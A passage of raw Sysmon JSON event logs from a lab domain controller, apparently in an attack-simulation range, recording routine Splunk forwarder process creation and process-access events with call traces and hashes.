Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.077","SourceProcessGUID":"{41C8662E-1FB7-5F25-0000-001051DF0400}","SourceProcessId":"4240","SourceThreadId":"4260","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2742,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nProcessGuid: {41C8662E-1FB8-5F25-0000-001017E10400}\r\nProcessId: 4324\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","ProcessGuid":"{41C8662E-1FB8-5F25-0000-001017E10400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2743,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FB8-5F25-0000-001017E10400}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FB8-5F25-0000-001017E10400}","TargetProcessId":"4324","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2744,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FB8-5F25-0000-001017E10400}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FB8-5F25-0000-001017E10400}","TargetProcessId":"4324","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2745,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2746,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2747,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2748,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2749,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.812\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:32.812","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 